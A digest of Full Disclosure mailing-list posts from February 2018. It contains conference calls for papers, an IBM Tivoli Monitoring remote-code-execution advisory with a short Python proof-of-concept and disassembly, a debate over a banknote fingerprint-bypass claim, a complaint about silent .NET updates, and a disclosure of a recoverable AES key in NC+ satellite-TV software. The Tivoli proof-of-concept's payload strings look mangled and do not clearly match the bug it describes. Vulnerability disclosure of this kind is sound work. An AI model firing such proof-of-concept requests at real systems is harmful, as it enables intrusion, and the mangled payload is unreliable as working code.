[FD] EuskalHack Security Congress Call For Papers

2018-02-06 Thread Joxean Koret 
] EuskalHack Security Congress III Call For Papers [

Introduction


EuskalHack Security Congress Third Edition is a new proposal from the
EuskalHack Computer Security Association, with the aim to promote the
community growth and the culture in the digital security field. As
usual, in this new edition proximity to our public and technical
quality will be our hallmarks.

This exclusive conference is shaping up as the most relevant in Basque
Country, with an estimated 180 attendees for this third edition.

The participants include specialized companies, state security
organizations, professionals, hobbyists and students in the area of
security and Information Technology.


Date and location
-

The date for the conference is the 22nd and 23rd of June 2018 in the
lovely city of Donostia – San Sebastian.


Take part as a speaker
--

We want to open the doors to all those who wish to be part of this
third edition of the EuskalHack Security Congress in one of the various
categories of talks and workshops we offer.

We are looking for small workshops or talks related to digital
security, information security or tech in general, such as:

 - Reverse engineering.
 - Robotics, Drones, Consoles, Hardware Hacking, Gadgets, mobile
environments...
 - Critical infrastructure security, industrial environments, Smart
City, financial...
 - Cloud insecurity, virtualization, containers, Hardening, cloud
forensics...
 - GSM signal hacking, SDR, LTE, 3G, Satellite links, VoIP...
 - Cryptography, steganography, forensics techniques and
countermeasures...
 - Data mining, Neuronal networks, statistical modeling...
 - Malware, APT, Sandboxing, Sandbox escapes, Bypassing “things”...
 - Corporate security and intelligence, OPSEC, OSINT...
 - Web Hacking, SQL and NoSQL injection, LDAP injection, Hacking with
search engines...
 - Hacktivism, net neutrality, Deep web, darknet, cryptocurrencys...

All proposals will be valued according to its originality, educational
value, contribution to the community, and the capacity to make our
audience have a good time.

Highest priority will be given to those proposals that have not been
previously exhibited at another event. Please don't forget to indicate
it when making your submission.


Language and internationalization
-

At EuskalHack we value linguistic diversity and internationalization;
this is why we accept talks in Spanish, Basque or English. Just let us
know what language you plan to use for your slides and for the talk. 

Note: We positively value bilingual options which can be understood by
the maximum number of attendees as possible as, in example, slides in
one language while speaking in another one.


Talks and Workshops
---

We will have several spaces over the course of the event, which will
include talks and workshops concurrently, taking two different
approaches:


 * Standard talks: 50 minutes duration
 * Specific workshops: 120 minutes duration

Once all the proposals have been received, the total number of
presentations of each type will be determined, considering aspects such
as technological diversity and the audience.


Proposals
-

Proposal submissions should be sent before March 19th through the forms
found on the following links:

ENGLISHhttps://goo.gl/nM9pKa
EUSKERAhttps://goo.gl/qdB2mS
SPANISHhttps://goo.gl/NkABaf


Dates to consider
-

The following are the dates and milestones which should be considered
during various phases by the speakers directly involved:

17/01/18Speaker registration begins
19/03/18Speaker registration ends
04/04/18Speaker confirmation date deadline by the organisation 
01/05/18Speaker requirements submission
31/05/18Follow-up communication
21/06/18Speakers reception
22/06/18EuskalHack Security Congress

Commitment in meeting the dates set by those interested for the paper
planning and effective implementation of the congress is requested.


Speaker rights and privileges
-

 * Take part in the reference security congress in Basque Country.
 * Round trip paid by the organization (conditions to be agreed *).
 * Accommodation paid in a hotel near to the congress, in the beautiful
city of Donostia - San Sebastian (Double room).
 * Complete access to the conference with a companion.
 * Dinners with the other speakers and conference organizers.
 * 40% off on the EuskalHack association fee for the first year.


Disclaimer
--

 * The talks and workshops not exhibited previously at another security
congresses or media will be considered a priority.
 * Compliance with obligations and regulations by all concerned parties
is vital to avoid any setbacks for the speaker and the congress.
 * The duration of the talks must stick to the terms of the agreement,
allowing the audience to have time for the round of questions.
 * The talks and workshops mus

[FD] CFP for Packet Hacking Village Talks at DEF CON 26

2018-02-06 Thread Ming 
OVERVIEW

The Wall of Sheep would like to announce a call for presentations at
DEF CON 26 at the Caesars Palace in Las Vegas, NV from Thursday,
August 9th to Sunday, August 12th. Speaker Workshops has been renamed
Packet Hacking Village Talks as we now offer hands-on
workshops. Packet Hacking Village Talks goal is to deliver talks that
increase security awareness and provide skills that can be immediately
applied after the conference. Our audience ranges from those who are
new to security to the most seasoned practitioners in the security
industry. Introductory talks are welcome.

Topics of interest include:

* Tools on network sniffing, intrusion detection, monitoring,
  forensics

* How to find and evict people harvesting cryptocurrency on your
  devices

* How to do refresh your PC without losing all your stuff and
  eliminate the malware

* Incident response recovery

* Justifying hacking / security tools in the corporate world

* Finding rootkits and malware

* General Digital Forensics and Incident Response (DFIR) talks

* How to use regulatory compliance requirements in your favor to
  enhance your overall funding and security posture

* Security awareness program success and failure stories

* Enterprise defense using open source tools (e.g., Yara, Cuckoo
  Sandbox)

* Tool / task automation and optimization

* New and innovative ways of using old tools

* Incident response process and procedures

* Tools for data collection and visualization

* Purple teaming

The Wall of Sheep will not accept product or vendor related
pitches. If your talk is a thinly-veiled advertisement for a product
or service your company is offering, please do not apply!

All accepted talks will be announced, recorded, and published by Aries
Security, LLC. and DEF CON Communications, Inc. Please see our YouTube
channel for all talks from previous years:
https://www.youtube.com/channel/UCnL9S5Wv_dNvO381slSA06w.

The Call for Presentations will close on Thursday, June 15th at 11:59
PM. The list of talks will be finalized and published on Friday, June
30th.

SPEAKING FORMAT

Each presentation slot is 1 hour maximum, including time for Q&A. If
we have time and it is in line with our goals mentioned above, then
there is a good chance you will be selected.

To submit a presentation, please provide the following information in
the form below to cfp2018[at]wallofsheep[dot]com

Primary Speaker Name:

Primary Speaker Title and Company (if applicable):

Primary Speaker Email Address:

Primary Speaker Phone Number (to contact you if necessary during the
conference):

Primary Speaker Twitter name (if you want it known if you are
accepted):

Primary Speaker Facebook page (if you want it known if you are
accepted):

Additional Speakers' name(s), titles, and social information:

Additional Email Addresses:

Is there a specific day or time you MUST speak by?

Name of Presentation:

Length of presentation: (20 minutes or 50 minutes)

Abstract:

Your abstract will be used for the website and printed
materials. Summarize what your presentation will cover. Attendees will
read this to get an idea of what they should know before your
presentation, and what they will learn after. Use this to inform about
how technical your talk is. This abstract is the primary way people
will be drawn to your session. CFP reviews like to see what tools will
be used and what materials you suggest to read in advance to get the
most out of your presentation.

Equipment Needs & Special Requests:

The Wall of Sheep will provide 1 projector feed, and microphones. If
you need to use multiple outputs for a demo, please mention this
below.

Speaker's Bio(s):

This text will be used for the website and printed materials and
should be written in the third person. Cover any professional history
that is relevant to the presentation, including past jobs, tools that
you have written, etc. Let people know who you are and why you are
qualified to speak on your topic. Presentations that are submitted
without biographies will not be considered.

Detailed Outline:

You must provide a detailed outline containing the main points and
navigation through your talk. Show how you intend to begin, where you
intend to lead the audience and how you plan to get there. The outline
may be provided in a separate attachment and may be as simple as a
text file or as detailed as a "bare bones" presentation. The better
your outline then the better we are able to best review your
presentation against other submissions (and the higher chance you have
of being accepted). SUBMISSION NOTE: Presentations that are submitted
without abstracts, outlines, or speaker bios (e.g., that have only
PDFs, PPTs, or white papers attached or only point to a URL) will not
be considered.

Supporting File(s):

Additional supporting materials such as code, white papers, proof of
concept, etc. should be sent along with this email to
cfp2018[at]wallofsheep[dot]com. Note that additional files that may
help in the selection proce

[FD] IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution Vulnerability

2018-02-06 Thread p 
IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution Vulnerability

CVEID: CVE-2017-1635
CVSS Base Score: 8
Affected Products and Versions
The KDH component of IBM Tivoli Monitoring Basic Services (KGL,KAX) for
Version 6.2.2 through 6.2.2 Fix Pack 9


A vulnerability exists in the internal web server provided by IBM Tivoli
Monitoring basic services. It could allow a remote attacker to execute
arbitrary code on the system, caused by a use-after-free error. A remote
attacker could exploit this vulnerability to execute arbitrary code on
the system or cause the application to crash.
The web server component "KDH", after receiving certain requests,
executes a memory region in the heap previously freed by the component
itself.
An attacker is able to fill the heap before the memory is reused, in
order to execute arbitrary code.

poc.py


import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("localhost",1920))

payload = 'GET
/index.php?action=storenew&username=alert()index.php?action=storenew&username=alert()
HTTP/1.1\r\n\r\n'
s.send(payload)

payload = 'GET
/index.php?action=search&searchFor=\">alert()
HTTP/1.1\r\n\r\n'
s.send(payload)
print s.recv(1024)


0x6191BCF8 - malloc in BSS1_NewFormat
0x61903fea - free in BSS1_EndFormat
0x6191BDEF - call to ecx+4

At first, malloc() is called to allocate space (0x400) where application
will put response page to the faulty request; then free() is called on
the same address used in the “call [ecx+4]” later on.

The disassembly code involved is:
kbb.dll:61903FD7 mov eax, [edx]
kbb.dll:61903FD9 pusheax
kbb.dll:61903FDA mov ecx, [ebp-8]
kbb.dll:61903FDD calldword ptr [ecx+4] <- here is
called the address of the previously freed heap + 4

Supporting techincal details:
As shown in the WinDbg screenshot
(http://www.quantumleap.it/wp-content/uploads/2018/02/tivoli_windbg.jpeg),
execution is suspended at 0x004c0931, where the payload is “\xcc” -
breakpoint.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-06 Thread InterN0T via Fulldisclosure 
Exactly how many people are using these banknotes for "fake fingerprints" with 
their phone?

The reason why you use your own fingerprint, and not a standardized hologram 
fingerprint from a Euro bank note, is so that only your fingerprint can unlock 
your phone for example.

This whole advisory seems like one big troll.


For example this:
--
5. [Truncated] An agent could for example save data variables in the biometric 
sign of the banknote to exfiltrate information.

Note: Yeah they could also embed secret information anywhere else in the bank 
note, for example the micro-text, UV text, or probably even INSIDE the bank 
note.
--

A lot of fingerprint readers are pretty bad and imperfect by design too.

Mythbusters Fingerprint Bypass:
https://www.youtube.com/watch?v=3Hji3kp_i9k
Note: Look at the end where they used a photocopy on a piece of paper to bypass 
that particular lock.

German Fingerprint Hack:
https://www.theguardian.com/technology/2014/dec/30/hacker-fakes-german-ministers-fingerprints-using-photos-of-her-hands

Master Fingerprints Hack:
https://www.express.co.uk/life-style/science-technology/791055/smartphone-fingerprint-scanner-hacked-criminals-scan-data
​
Hot Glue Fingerprint Mold:
https://www.youtube.com/watch?v=kinq5nzY37c

General flaws about fingerprints:
https://globalnews.ca/news/3371112/smartphone-fingerprint-sensors-hack/

 Original Message 
 On February 2, 2018 7:56 PM, Ben Tasker  wrote:

>There's some detail in the Vulnerability magazine link, reproducing here so
> there's a record
>
> We discovered an anomaly in the hologram section of the new printed 20€ &
> 50€ banknotes. The security sign on the banknotes are produced with a
> transparent film. In the middle of the new hologram of the 20 & 50€
> banknotes is a picture of a women and different fingerprint-like
> structures. At the moment we noted the problem, we used a microscope to
> look closer.
>
> After an internal discussion, that the security sign could maybe used for
> biometrics authentication processes, we tested the hologram for usage on
> different fingerprinter-scanners like asus pro laptop, eikon, samsung
> galaxy S7/8 and the apple iphone v11. All mechanisms could be bypassed
> using the hologram of the banknotes to fake a fingerprint which is accepted
> by the fingerprint-scanner system. After that, the attacker is able to
> relogin with the universal hologram.
>
> Finally, we were able to bypass the the biometric identification process of
> the different devices. No system is able to identify, that the hologram is
> not a real fingerprint. At the end, we figured out in the testing process
> that the holograms can be used to add via write and auth via read. There
> are now muliple problems in connection to the security issue.
>1. Fingerprint - Reader & Writer (Mobile Devices)
>
> The end user devices like phones with fingerprinter sensors of
> manufacturers like samsung, apple, huawei & co are permanently vulnerable
> to this new type of attack. The sensor does not approve the reflection of
> the hologram in the read and write mode. It interprets the security signs
> as features of a real fingerprint. Thus results in an easy bypass using any
> 20€ or 50€ banknotes after registration. To use an attacker only requires
> to use his finger behind the hologram to bypass the fingerpulse check of
> the idevice. All other mechanism are not accurate approving the content
> during the sensor check.
>
>
>2. Biometric Security in Europe
> Each time the EZB produces more of the affected banknotes, the biometric
> security in all over europe countries is generally weakened. In the near
> future the EZB plans to inetrgate the holograms to any banknote (5€, 10€,
> 100€ & Co.). This would be a crazy incident for all biometric systems using
> a fingertip to authenticate because of any person is by now able to perform
> those typ of attacks against an environment or service.
>
>
>3. Fake fingerprints to go
> Any person that has access to a system could use a hologram of a european
> banknote to fake his fingerprint. Even the once which do not have the
> expertise to fake it because in case of a publication, the government would
> have to reckon with it.
>
>
>4. Universal fingerprint as key
> One time a hologram is written to a database, any attacker could use
> another hologram of the same banknote series to bypass the security
> mechanism to finally get access to the environment. Also administrators or
> moderators are able to setup a universal fingerprint key to any dbms for
> further entrance.
>
>
>5. Save content in biometric signs or read data
> The problematic could be used by security agencies to save data in the
> biometric sign or to use them to get access to protected environments. An
> agent could for example save data variables in the biometric sign of the
> banknote to exfiltrate information.
>
>
>6. Information in the hologram
> In the special case of a fingerprint entry is generated by mathematical
>

[FD] Defense in depth -- the Microsoft way (part 50); Windows Update shoves unsafe crap as "important" updates to unsuspecting users

2018-02-06 Thread Stefan Kanthak 
Hi @ll,

on all but their latest versions of Windows (which Microsoft ships
with .NET Framework 4.x), Microsoft shoves COMPLETELY NEW versions
of .NET Framework via Windows/Automatic Updates onto the PERSONAL
computers of their unsuspecting users^Wcustomers, even and especially
when those customers^Wpoor victims have NOT A SINGLE application
installed which needs .NET Framework at all, and installs them
without asking or even informing their customers, SILENTLY!

Trustworthy computing? NOPE!

In detail:

* Users of Windows 2000 got .NET Framework 1.1, then 2.0 and 3.0
  shoved onto their computers, SILENTLY!

JFTR: .NET Framework 2.0 is NOT an update to .NET Framework 1.x,
  but a COMPLETELY new and incompatible version, which gets
  installed aside a previous version.

* Users of Windows XP got and users of Windows Embedded POSReady 2009
  still get .NET Framework 2.0, then 3.0, 3.5, 3.5.1 and 4.0 shoved
  onto computers, SILENTLY!

JFTR: neither Windows 2000 nor Windows XP shipped with any version
  of .NET Framework.
  Especially with these versions of Windows, pushing
  .NET Framework as "Update" is an euphemism.

JFTR: .NET Framework 4.x is NOT an update to any prior version of
  .NET Framework, but a COMPLETELY new and incompatible version,
  which gets installed aside previous versions.
  At least Microsoft continued to use the euphemism "Update".

* Users of Windows Server 2003 and Windows Server 2003 R2 got
  .NET Framework 2.0, then 3.0, 3.5, 3.5.1 and 4.0 shoved onto
  computers, SILENTLY!

JFTR: Windows Server 2003 shipped with .NET Framework 1.1, and
  Windows Server 2003 R2 with both .NET Framework 1.1 and 2.0.

* Users of Windows Vista got, and users of Windows Server 2008
  still get .NET Framework 3.5, 4.0, 4.0.1, 4.5, 4.5.1, 4.5.2 and
  4.6 shoved onto computers, SILENTLY!

JFTR: both versions of Windows shipped with .NET Framework 3.0,
  for which 3.5 may be considered an update.

* Users of Windows 7 as well as users of Windows Server 2008 R2
  still get .NET Framework 4.0, 4.0.1, 4.5, 4.5.1, 4.5.2, 4.6,
  4.6.1, 4.6.1, 4.7 and 4.7.1 shoved onto computers, SILENTLY!

JFTR: both versions of Windows shipped with .NET Framework 3.5.1.


Every installed version of .NET Framework enlarges the attack
surface of Windows, SIGNIFICANTLY, and contains multiple known
vulnerabilities Microsoft WON'T FIX, for example:

* the (update) installers of EVERY version of .NET are vulnerable
  to DLL hijacking and allow to perform escalation of privilege:
  see 

* all versions of .NET Framework are vulnerable to DLL hijacking
  and allow a trivial to perform escalation of privilege: see
  


Mitigation:
~~~

To block WU/AU from shoving .NET Framework 4.x SILENTLY to your
computer, see the MSKB articles
,
,
,
,
 and
: then create the
following *.REG and import it.

--- *.REG ---
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\WU]
"BlockNetFramework4"=dword:0001
"BlockNetFramework45"=dword:0001
"BlockNetFramework451"=dword:0001
"BlockNetFramework452"=dword:0001
"BlockNetFramework46"=dword:0001
"BlockNetFramework461"=dword:0001
"BlockNetFramework462"=dword:0001
"BlockNetFramework47"=dword:0001
"BlockNetFramework471"=dword:0001
--- EOF ---

To block earlier versions, see the MSKB articles
,
 and
.


stay tuned
Stefan Kanthak


PS: Microsoft implemented .NET Framework in Windows NT in a
TOTALLY flawed and wrong way: if done right, it were an
NT subsystem, like the "Subsystem for OS/2", the POSIX
subsystem, the "Subsystem for UNIX Applications", the
"Windows Subsystem for Linux" or Windows itself.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [SE-2011-01] A security issue with a Multiroom service of NC+ SAT TV platform

2018-02-06 Thread Security Explorations 


Hello All,

A couple of weeks ago, Platform NC+ [1], one of the major digital SAT
TV providers in Poland issued an official message [2] to subscribers
about the policy of content security. Among other things, the following
statements were included in it:

"Platform nc+ as a technology leader in the market and an operator with
a rich program offer conducts many activities aimed at providing a high
security of the offered content".

"In order to fulfill the requirements of content providers, platform nc+
is obliged to completely secure the Multiroom service".

We decided to have a look underneath the implementation of the security
of Multiroom service and found out that the above claims hardly reflect
the reality.

More specifically we discovered that a shared AES key used to secure the
Multiroom service of NC+ operator can be discovered. This is due to the
following:
1) MPEG broadcast stream containing SSU image for certain NC+ devices is
   not encrypted (software upgrade image can be downloaded regardless of
   the presence of a Conax card in the STB device - there is no need to
   decrypt MPEG stream with the use of Control Words).
2) software upgrade image for ITI-5800S Multiroom client device, although
   encrypted can be easily decrypted (in 2012, we published information
   about plaintext SW upgrade keys being broadcasted along the upgrade
   image [3][4], this issue hasn't been addressed),
3) ITI-5800s upgrade file embeds Compressed ROMFS image containing root
   filesystem for ITI-5800S device, this image can be extracted under
   Linux OS,
4) the binary of a main STB application embeds a custom Java File System
   (ROMFS), which can be also successfully extracted / unpacked,
5) ROMFS filesystem contains obfuscated Java classes of which one includes
   a hardcoded initialization vector and AES key used to secure Multiroom
   service of NC+ operator (this key is used to encrypt / decrypt a file
   carrying authorization data for a client device).

Full report along a Proof of Concept code illustrating our findings can be
downloaded from the following locations:

http://www.security-explorations.com/materials/se-2011-01-33.pdf
http://www.security-explorations.com/materials/se-2011-01-33.zip

We usually follow our Disclosure Policy [5] (modified recently to reflect
SRP research [6]) when it comes to reporting and disclosing vulnerabilities.
We do not when experiencing issues like that [7]:

"Vendors not responding to our email messages for 7+ days:
- Advanced Digital Broadcast (set-top-box vendor)
  awaiting response to the message from 11-Jan-2012
- ITI Neovision (SAT TV operator)
  awaiting response to the message from 01-Feb-2012".

Thank you.

--
Best Regards,
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
"We bring security research to a new level"
-

References:
[1] NC+ Platform
http://ncplus.pl/
[2] Polityka Zabezpieczenia Treści
http://ncplus.pl/zabezpieczenie-tresci
[3] SE-2011-01 Issues #5-16,#25-32 (Advanced Digital Broadcast),
http://www.security-explorations.com/materials/se-2011-01-adb.pdf
[4] "Security threats in the world of digital satellite television”
http://www.security-explorations.com/materials/se-2011-01-hitb1.pdf
[5] Security Explorations - Disclosure Policy
http://www.security-explorations.com/en/disclosure-policy.html
[6] Security Research Program
http://www.security-explorations.com/en/srp.html
[7] SE-2011-01 Vendors status
http://www.security-explorations.com/en/SE-2011-01-status.html


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/